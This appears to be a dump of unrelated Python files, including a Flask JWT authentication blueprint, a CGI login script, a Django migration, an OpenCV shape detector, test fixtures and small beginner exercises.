# from entities import InvalidEntity
products = {
"Recommendation Services": "REPERIO",
"Virtual/Mixed Reality": "KIWANO",
"Content Similarity": "Search & Discovery"
}
class CockpitPresenter(PresenterBase):
def __init__(self, columns, nice = lambda item: item, sort = [], placeholder = "n/a"):
PresenterBase.__init__(self)
self.available_columns = {
"name": ("Specific Enabler", self.lookup_name),
"avail-fi-ppp": ("availability for the FI-PPP partners", None),
"avail-fi-lab": ("availability within FI-LAB", None),
"avail-3rd-party": ("availability beyond the FI-PPP", None),
"product": ("SE implementation product(s) name(s)", self.lookup_product),
"owner": ("Owner", self.lookup_owners),
"open-source": ("Open Source (Yes/No/Planned)", self.lookup_opensource),
"mode": ("mode", self.lookup_mode),
"last-update": ("date last update", None),
"next-update": ("date next / 1st update", None),
"assets": ("Baseline assets", self.lookup_assets),
"catalog": ("Entry in Catalogue", self.lookup_catalog),
"final-release": ("Final release", lambda se: self.lookup_release('08/15', se)),
"roadmap": ("Roadmap", self.lookup_roadmap)
}
self.columns = [col for col in columns if col in self.available_columns]
self.nice = nice
self.placeholder = placeholder
self.sort = [self.columns.index(col) for col in sort if col in self.columns]
def lookup_release(self, rel, se):
return 'X' if self.final_release.contains_se(se) else ''
def lookup_product(self, se):
id = se.get_name()
if id in products:
return products[id]
return '-'
def lookup_roadmap(self, se):
nc = se.get_naming_conventions()
if nc is None:
return self.placeholder
roadmap = nc.roadmap()
if roadmap is None:
return self.placeholder
return roadmap
# def lookup_availability(self, se):
# return self.currentrelease.contains_se(se)
def lookup_name(self, se):
name = self.nice(se)
if name is None:
return self.placeholder
return name
def lookup_owners(self, se):
owners = se.get('/spec/owners')
if owners is None:
return '[[UNKNOWN OWNER]]'
return ', '.join(owners)
def lookup_status(self, se):
if self.final_release.contains_se(se):
return 'available'
status = se.get('/status')
if status is None:
return self.placeholder
return status
def lookup_assets(self, se):
wiki = se.get('/auto/documentation/wiki-url')
if wiki is None:
return self.placeholder
return wiki
def lookup_catalog(self, se):
# if not self.lookup_availability(se):
# return 'not (yet) available'
nc = se.get_naming_conventions()
if nc is None:
return self.placeholder
return nc.catalogurl()
def lookup_opensource(self, se):
open = se.get('/auto/license/is-open-source')
if open is None:
return self.placeholder
return open
def lookup_mode(self, se):
mode = []
if se.get('/auto/license/is-open-source') == 'Yes':
template = se.get('/spec/license/template')
mode.append('open source (%s)' % template)
if se.get('/auto/delivery/hosted-service') == 'Yes':
saas = 'SaaS'
if se.get('/spec/delivery/instances/public') is not None:
saas = 'Global SaaS instance'
elif se.get('/spec/delivery/instances/fi-ppp') is not None:
saas = 'Dedicated SaaS instance'
mode.append(saas)
binary = se.get('/spec/delivery/binary')
if binary is not None:
platforms = ', '.join(binary.keys())
mode.append('binaries (%s)' % platforms)
if len(mode) == 0:
return self.placeholder
return ', '.join(mode)
def present_col(self, se, colname):
if colname not in self.available_columns:
return self.placeholder
col = self.available_columns[colname]
f = col[1]
if f is None:
return self.placeholder
v = f(se)
if v is None:
return self.placeholder
return v
def present_se(self, se):
return [self.present_col(se, colname) for colname in self.columns]
def present(self, meta):
# self.currentrelease = meta.find_current_release()
rels = meta.get_releases()
self.final_release = rels[-1]
self.rows = [self.present_se(se) for se in meta.get_specific_enablers()]
if len(self.sort) > 0:
self.rows.sort(key = lambda row: tuple([row[idx] for idx in self.sort]))
def dump_row(self, out, row, sep = '|'):
out.write((sep + ' %s ' + sep) % ((' ' + sep + ' ').join(row)))
def dump(self, out):
headings = [self.available_columns[colname][0] for colname in self.columns]
self.dump_row(out, headings, '^')
for row in self.rows:
self.dump_row(out, row)
|
import jvcr
from route_machine import Scene
class TitleScene(Scene):
def __init__(self) -> None:
self.timer = 0
def on_activate(self):
self.timer = 0
def update(self, dt) -> str:
self.timer += dt
jvcr.spr(0, 0, 0, 48*16, 256, 144, 0, 0, 0)
if self.timer > 10:
return "next"
if self.timer > 0.5 and jvcr.btn(jvcr.BTN_B, 0):
return "next"
|
# -*- coding: utf-8 -*-
from werkzeug.datastructures import Headers
from flask import (
current_app, jsonify, request,
Blueprint, Response
)
from flask_jwt_extended import (
create_access_token, create_refresh_token, current_user,
get_csrf_token, jwt_refresh_token_required, jwt_required,
set_refresh_cookies, set_access_cookies, unset_jwt_cookies,
JWTManager
)
from flask_restplus import Api, Resource
from marshmallow import fields, Schema
from app.models.usuario import UsuarioModel
from app.models.revoked_token import RevokedTokenModel
jwt = JWTManager()
auth_bp = Blueprint('auth', __name__)
# configura autenticacao
# baseado no nome do usuario
@jwt.user_identity_loader
def user_identity_lookup(usuario):
return usuario.usuario
# obtem o objeto do atual usuario
@jwt.user_loader_callback_loader
def user_loader_callback(identity):
return UsuarioModel.query.filter_by(usuario=identity).first()
# trata mensagem de erro no acesso a um endpoint nao acessivel
@jwt.user_loader_error_loader
def custom_user_loader_error(identity):
ret = {
"message": "User {} not found".format(identity)
}
return jsonify(ret), 401
# verifica se o access/refresh token esta na blacklist
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return RevokedTokenModel.is_jti_blacklisted(jti)
auth = Api(auth_bp)
class LoginSchema(Schema):
usuario = fields.Str(required=True, min_length=6)
senha = fields.Str(required=True)
login_schema = LoginSchema()
@auth.route('/login')
class LoginResource(Resource):
def post(self):
args = login_schema.dump(request.form).data
usuario = UsuarioModel.autenticate(args['usuario'], args['senha'])
if usuario:
# cria tokens
access_token = create_access_token(usuario)
refresh_token = create_refresh_token(usuario)
# resposta com csrf's
res = jsonify({
'access_csrf': get_csrf_token(access_token),
'refresh_csrf': get_csrf_token(refresh_token)
})
# Set the JWT cookies in the response
set_access_cookies(res, access_token)
set_refresh_cookies(res, refresh_token)
return res
else:
return jsonify({'login': False}), 401
@auth.route('/fresh-login')
class FreshLoginResource(Resource):
def post(self):
args = login_schema.dump(request.form)
usuario = UsuarioModel.autenticate(args['usuario'], args['senha'])
if usuario:
access_token = create_access_token(usuario, fresh=True)
res = jsonify({
'access_csrf': get_csrf_token(access_token)
})
set_access_cookies(res, access_token)
return res
else:
return { 'error': 'Usuário ou Senha incorreto' }, 400
@auth.route('/logout')
class LogoutResource(Resource):
@jwt_required
def post(self):
res = jsonify({'logout': True})
unset_jwt_cookies(res)
return res
@auth.route('/refresh')
class RefreshResource(Resource):
@jwt_refresh_token_required
def post(self):
access_token = create_access_token(current_user)
res = jsonify({
'access_csrf': get_csrf_token(access_token)
})
set_access_cookies(res, access_token)
return res
# encapsula registro do modulo
def init_app(app):
app.register_blueprint(auth_bp)
|
#!/usr/bin/env python3
import analyse
import sys
scores = analyse.load_scores()
scores[0].to_csv(sys.argv[1])
scores[1].to_csv(sys.argv[2])
|
import os
import pytest
from ebonite.build.builder.base import use_local_installation
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
# these imports are needed to ensure that these fixtures are available for use
from tests.conftest import has_docker
from tests.ext.test_s3.conftest import s3_artifact, s3server # noqa
from tests.ext.test_sqlalchemy.test_postgres.conftest import postgres_meta, postgres_server # noqa
@pytest.fixture
def remote_ebnt(tmpdir, postgres_server, postgres_meta, s3server, s3_artifact): # noqa
with use_local_installation():
# we reconstruct all objects here to ensure that config-related code is covered by tests
ebnt = Ebonite.custom_client(
metadata="sqlalchemy", meta_kwargs={
"db_uri": postgres_meta.db_uri
},
artifact="s3", artifact_kwargs={
"bucket_name": s3_artifact.bucket_name,
"endpoint": s3_artifact.endpoint,
"region": s3_artifact.region
})
cfg_path = os.path.join(tmpdir, 'config.json')
ebnt.save_client_config(cfg_path)
yield Ebonite.from_config_file(cfg_path)
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(remote_ebnt, 'remote')
def pytest_collection_modifyitems(items, config):
for colitem in items:
if colitem.nodeid.startswith('tests/client/remote.py::'):
colitem.add_marker(pytest.mark.docker)
colitem.add_marker(pytest.mark.skipif(not has_docker(), reason='no docker installed'))
|
# Generated by Django 2.0.9 on 2019-07-19 21:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movement', '0011_auto_20190521_1454'),
]
operations = [
migrations.AlterModelOptions(
name='movementbetweenofficerequest',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento entre oficinas', 'verbose_name_plural': 'Requerimientos de Movimientos entre oficinas'},
),
migrations.AlterModelOptions(
name='movementboxcolombia',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la caja de Colombia', 'verbose_name_plural': 'Movimientos de la caja de Colombia'},
),
migrations.AlterModelOptions(
name='movementdailysquare',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del Cuadre Diario', 'verbose_name_plural': 'Movimientos del Cuadre Diario'},
),
migrations.AlterModelOptions(
name='movementdonjuan',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'},
),
migrations.AlterModelOptions(
name='movementdonjuanusd',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'},
),
migrations.AlterModelOptions(
name='movementoffice',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la oficina', 'verbose_name_plural': 'Movimientos de la oficina'},
),
migrations.AlterModelOptions(
name='movementpartner',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del socio', 'verbose_name_plural': 'Movimientos del socio'},
),
migrations.AlterModelOptions(
name='movementprovisioning',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de aprovisionamiento', 'verbose_name_plural': 'Movimientos de aprovisionamiento'},
),
migrations.AlterModelOptions(
name='movementrequest',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento', 'verbose_name_plural': 'Requerimientos de movimientos'},
),
migrations.AlterModelOptions(
name='movementwithdraw',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de retiro', 'verbose_name_plural': 'Requerimientos de retiro'},
),
migrations.AlterField(
model_name='movementbetweenofficerequest',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementboxcolombia',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdailysquare',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdonjuan',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdonjuanusd',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementoffice',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementpartner',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementprovisioning',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementrequest',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementwithdraw',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
]
|
class Solution:
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# nums.sort()
# max_sum = 0
# i = 0
# while (i<= len(nums)-1):
# max_sum += nums[i]
# i += 2
# return max_sum
res = [0]*20001
for i in nums:
res[i+10000]+=1
total, flag=0, 0
for idx, freq in enumerate(res):
if freq:
import pdb; pdb.set_trace()
freq-=flag
calc, flag = divmod(freq,2)
total+=(calc+flag)*(idx-10000)
return total
abc = Solution()
print (abc.arrayPairSum([1,4,3,2,5,6])) |
#!/usr/bin/env python
'''
------------------------------------------------------------------------------------------
Copyright 2020 Romeo Dabok
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-------------------------------------------------------------------------------------------
Notes: This is just the sign in (or log in) script. Grabs the password an username from the forms,
runs em through the the log in function and then sends a script to be executed depending on the result.
'''
#import modules for CGI handling
import cgi
import theroom
# Create instance of FieldStorage
form = cgi.FieldStorage()
gun = form.getvalue('uname')
gpw = form.getvalue('pword')
# Trys to sign up
pros = theroom.logIn(gun,gpw)
rpage = ""
if (pros[0] == True):
rpage = '''
isLoggedIn = true;
setTimeout("changeRoom('lobby');",10);
''' #% (gun,gpw,pros[1])
#print(pros[2].output())
else:
rpage = '''
var erp1 = document.getElementById('errorplace1');
var erp2 = document.getElementById('errorplace2');
erp1.innerHTML="Username or Password is incorrect";
erp2.innerHTML="Password or Username is incorrect";
'''
print("Content-Type: text/xml\r\n")
print(rpage)
|
#!/usr/bin/env python3
# Contours, shape detection
__author__ = "Cristian Chitiva"
__date__ = "September 12, 2021"
__email__ = "[email protected]"
import cv2
import numpy as np
def getContours(image):
contours, Hierarchy = cv2.findContours(image, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
print(area)
if area > 500:
cv2.drawContours(imgContour, contours=cnt, contourIdx=-1, color=(255,0,0), thickness=3)
perimeter = cv2.arcLength(curve=cnt, closed=True)
print(perimeter)
approx = cv2.approxPolyDP(curve=cnt, epsilon=0.02*perimeter, closed=True)
objCor = len(approx)
x, y, width, height = cv2.boundingRect(approx)
if objCor == 3:
objType = 'Tri'
elif objCor == 4:
aspRatio = width/float(height)
if aspRatio > 0.95 and aspRatio < 1.05:
objType = 'Square'
else:
objType = 'Rect'
elif objCor > 4:
objType = 'Circle'
else:
objType = 'None'
cv2.rectangle(imgContour, pt1=(x,y), pt2=(x+width,y+height), color=(0,255,0), thickness=2)
cv2.putText(imgContour, text=objType, org=(x+width//2, y+height//2), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0), thickness=2)
# IMAGES
img = cv2.imread('resources/images/shapes.png')
imgContour = img.copy()
imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray, ksize=(7,7), sigmaX=1)
imgCanny = cv2.Canny(imgBlur, threshold1=50, threshold2=50)
getContours(imgCanny)
cv2.imshow('Original',img)
cv2.imshow('Gray',imgGray)
cv2.imshow('Blur',imgBlur)
cv2.imshow('Canny',imgCanny)
cv2.imshow('Contours',imgContour)
cv2.waitKey(0) |
#Escreva um programa que faça o computador
# "pensar" em um número inteiro entre 0
# e 5 e peça para o usuário tentar descobrir
# qual foi o número escolhido pelo computador.
# O programa deverá escrever na tela se o
# usuário venceu ou perdeu.
from random import randint
from emoji import emojize
from time import sleep
#Otimização e interface
print('=*'*20, 'JOGO DA ADIVINHAÇÃO', '=*'*20)
usuário = str(input('Qual seu nome, pequeno gafanhoto?:')).upper().strip()
#Randomizando valores no pc
pc = randint(0, 5)
#Erro do usuário sendo previsto
escolha = int(input('Pensei em um número de 0 a 5, {}\nDuvido tu acertares!\nR='.format(usuário)))
#Analisando
print('ANALISANDO...')
sleep(5)
if escolha > 5:
print('Número inválido. Tente Novamente!')
#Caso seja tudo normal(0 a 5)
if escolha <= 5 or escolha >= 0:
print('A escolha do PC foi {}\nA sua escolha foi {}\n\n'.format(pc, escolha))
#Validando o VENCEDOR
if pc == escolha:
print('AH, NÃO!. VOCÊ VENCEU!!!!!')
else:
print('HAHAHA. VENCI DE VOCÊ!!!!!!!!!!!!!!!!!!!!!!!!!')
print('FIM.')
|
Subsets and Splits